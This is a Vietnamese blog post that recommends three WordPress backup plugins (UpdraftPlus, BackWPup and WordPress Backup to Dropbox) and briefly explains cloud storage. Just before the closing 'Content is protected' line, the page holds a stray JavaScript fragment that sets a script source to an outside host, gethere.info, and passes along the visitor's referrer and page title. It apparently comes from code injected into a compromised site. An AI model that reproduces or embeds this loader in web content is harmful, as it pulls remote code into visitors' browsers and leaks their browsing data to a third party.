Giới thiệu 3 Plugin Backup dữ liệu cho wordpress

Điện toán đám mây là một hình thức lưu trữ dữ liệu cho phép người dùng có thể kết nối và tương tác trên tất cả các cơ sở dữ liệu với nhau.

Nói theo một cách khác thì điện toán đám mây giúp người dùng có thể lưu trữ dữ liệu trên internet và có thể quản lý dữ liệu trên nhiều thiết bị khác nhau như máy tính và điện thoại.

Ưu điểm khi lưu trữ dữ liệu của web trên điện toán đám mây có những ưu điểm như sau:

+ Tương tác với dữ liệu ngay trên máy tính

+ Có thể tải về các máy khác khi cần thiết

+ Sử dụng bất kỳ chỗ nào có internet

+ Đảm báo không bị mất dữ liệu khi bị mã độc hoặc máy tính bị hỏng

Một số dịch vụ điện toán đám mây đang được rất nhiều người lựa chọn là Dropbox,Box,Sky Driver, gg driver.Nhưng những điện toán đám mây này cho lưu trữ rất ít bởi là free.

Sau đây mình xin giới thiệu đến các bạn 3 plugin có thể tự động bakup toàn bộ dữ liệu trên wordpress giúp bạn sử dụng dịch vụ điện toán đám mây.

Nên xem: Lập trình ứng dụng bé học toán

1, Plugin UpdraftPlus Backup and Restoration

updraftplus

Plugin này đang được rất nhiều webmaster sử dụng bởi sự tiện lợi, mạnh mẽ của nó giúp cho mọi người có thể upload các file backup lên nhiều điện toán đám mấy như Drobox, amzon s3, driver không những thể mà nó còn giúp bạn đưa lên cả FTP thông qua Email nữa.

Nếu như bạn cần phục hồi dữ liệu thì nó cũng giúp bạn làm việc đó.

Đồng thời nếu bạn cần phục hồi dữ liệu, nó cũng sẽ giúp bạn làm việc này ngay trong bảng điều khiển.

Xem thêm: Giới thiệu khoa hoc lap trinh android

2, Plugin BackwpUp

su-dung-backwpup-2

Plugin này được mình sử dụng nhiểu bởi nó có thể up lên nhiều wbe lưu trữ điện toán đám mây và đặt lịch làm việc hỗ trợ gửi file qua email rất tốt.Nhưng nó lại hơi khó sử dụng đối với người chưa tìm hiểu bao giờ.

Xem thêm: Lớp đào tạo khóa học lập trình php nâng cao

3, Plugin WordPress Backup to Dropbox

wp-to-dropbox

Plugin này sử dụng cho những người dùng Dropbox thì chỉ cần dùng plugin này thôi.Ngoài việc lưu trữ giữ liệu tự động thì plugin này có thêm tính năng đặt giờ tự động backup.

Chỉ cần bạn sử dụng 3 plugin này thôi thì bạn có thể backup đủ những gì bạn cần thiết.Hiện nay cũng có thêm 1 plugin hỗ trợ khác đó là Sky Drive của Microsoft và bạn cũng có thể cài đặt tự động sao lưu Sky driver bằng cách thủ công và mình sẽ hướng dẫn bạn ở một bài viết khác.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

error: Content is protected !!